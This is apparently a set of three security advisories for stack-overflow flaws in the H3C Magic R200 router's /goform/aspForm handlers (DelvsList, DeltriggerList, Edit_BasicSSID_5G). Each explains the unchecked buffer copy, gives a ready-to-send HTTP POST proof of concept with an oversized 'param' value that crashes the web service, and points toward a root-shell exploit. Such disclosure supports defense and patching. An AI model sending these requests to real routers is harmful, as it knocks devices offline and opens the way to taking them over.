\# H3C Magic R200 was discovered stack overflow via the DelvsList interface at /goform/aspForm ###### tags: \`H3C\` \`Magic R200\` vendor:H3C product:Magic R200 version:R200V100R004 type:Stack Overflow author:Wolin Zhuang, Yifeng Li; ## Vulnerability Description H3C Magic R200 R200V100R004 was discovered to contain a stack overflow via the DelvsList interface at /goform/aspForm. ## Vulnerability Details In function DelvsList,the size of local variable v6 is noly 16 bytes long.Parameters in the DelvsList interface use the getElement function to split strings(Var) and get items. !\[\](https://i.imgur.com/o43EsQb.png) !\[\](https://i.imgur.com/vv700yC.png) In line 28, the maximum size in the getElement function is limited to 64. When the length of input less than 64, the string will be copied into a1 by memcpy function. The size of the original array has been completely exceeded, resulting in a buffer overflow vulnerability. !\[\](https://i.imgur.com/5jTOUfB.png) ## Recurring vulnerabilities and POC In order to reproduce the vulnerability, the following steps can be followed: 1. Upgrade router Magic\_R200 to newest version(we have a physical machine) 2. Login to 192.168.124.1 as admin 3. Attack with the following POC !\[\](https://i.imgur.com/Gh5mBRc.png) \`\`\` POST /goform/aspForm HTTP/1.1 Host: 192.168.124.1 Content-Length: 321 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://192.168.124.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.63 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.124.1/dhcpd.asp Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PSWMOBILEFLAG=true; USERLOGINIDFLAG=; LOGIN\_PSD\_REM\_FLAG= Connection: close CMD=DelvsList&GO=dhcpd.asp&param=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa; \`\`\` By sending delicately constructed data package as the poc above, we can cause a stack overflow error, leading to denial of service. !\[\](https://i.imgur.com/wZ8HSuT.png) And you can write your own exp to get the root shell.

CVE-2023-29912: H3C Magic R200 was discovered stack overflow via the DelvsList interface at /goform/aspForm - HackMD

H3C Magic R200 version R200V100R004 was discovered to contain a stack overflow via the DeltriggerList interface at /goform/aspForm.

\# H3C Magic R200 was discovered stack overflow via the DeltriggerList interface at /goform/aspForm ###### tags: \`H3C\` \`Magic R200\` vendor:H3C product:Magic R200 version:R200V100R004 type:Stack Overflow author:Wolin Zhuang, Yifeng Li; ## Vulnerability Description H3C Magic R200 version R200V100R004 was discovered to contain a stack overflow via the DeltriggerList interface at /goform/aspForm. ## Vulnerability Details In function DeltriggerList,the size of local variable v7 is noly 16 bytes long.Parameters in the DeltriggerList interface use the getElement function to split strings(Var) and get items. !\[\](https://i.imgur.com/IJshUFq.png) !\[\](https://i.imgur.com/EJxYVPo.png) In line 28, the maximum size in the getElement function is limited to 64. When the length of input less than 64, the string will be copied into a1 by memcpy function. The size of the original array has been completely exceeded, resulting in a buffer overflow vulnerability. !\[\](https://i.imgur.com/5jTOUfB.png) ## Recurring vulnerabilities and POC In order to reproduce the vulnerability, the following steps can be followed: 1. Upgrade router Magic\_R200 to newest version(we have a physical machine) 2. Login to 192.168.124.1 as admin 3. Attack with the following POC !\[\](https://i.imgur.com/Gh5mBRc.png) \`\`\` POST /goform/aspForm HTTP/1.1 Host: 192.168.124.1 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.63 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.124.1/mobile.asp Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PSWMOBILEFLAG=true; USERLOGINIDFLAG=; LOGIN\_PSD\_REM\_FLAG= Connection: close Content-Length: 282 CMD=DeltriggerList&param=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa; \`\`\` By sending delicately constructed data package as the poc above, we can cause a stack overflow error, leading to denial of service. !\[\](https://i.imgur.com/71a3vWX.png) And you can write your own exp to get the root shell.

CVE-2023-29914: H3C Magic R200 was discovered stack overflow via the DeltriggerList interface at /goform/aspForm - HackMD

H3C Magic R200 version R200V100R004 was discovered to contain a stack overflow via the Edit_BasicSSID_5G interface at /goform/aspForm.

\# H3C Magic R200 was discovered stack overflow via the Edit\_BasicSSID\_5G interface at /goform/aspForm ###### tags: \`H3C\` \`Magic R200\` vendor:H3C product:Magic R200 version:R200V100R004 type:Stack Overflow author:Wolin Zhuang, Yifeng Li; ## Vulnerability Description H3C Magic R200 version R200V100R004 was discovered to contain a stack overflow via the Edit\_BasicSSID\_5G interface at /goform/aspForm. ## Vulnerability Details In function Edit\_BasicSSID\_5G, string Var is passed in by parameter 'param' without filtered and checking its length. Local varible v44 is 64 bytes long. in line 53, the content of Var is formatted into v44 without size check by sscanf function in the form of \`%\[^;\]\`, which leads to a stack overflow vulnerbility. !\[\](https://i.imgur.com/m4O5A1I.png) !\[\](https://i.imgur.com/wCkUR3J.png) ## Recurring vulnerabilities and POC In order to reproduce the vulnerability, the following steps can be followed: 1. Upgrade router Magic\_R200 to newest version(we have a physical machine) 2. Login to 192.168.124.1 as admin 3. Attack with the following POC !\[\](https://i.imgur.com/Gh5mBRc.png) \`\`\` POST /goform/aspForm HTTP/1.1 Host: 192.168.124.1 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.63 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.124.1/mobile.asp Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: USERLOGINIDFLAG=; LOGIN\_PSD\_REM\_FLAG= Connection: close Content-Length: 541 CMD=Edit\_BasicSSID\_5G&param=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa; \`\`\` By sending delicately constructed data package as the poc above, we can cause a stack overflow error, leading to denial of service. !\[\](https://i.imgur.com/P2cIzcj.png) We can see process webs is crashed and restarted. !\[\](https://i.imgur.com/Ap2kSe4.png) And you can write your own exp to get the root shell.

Tag

#webkit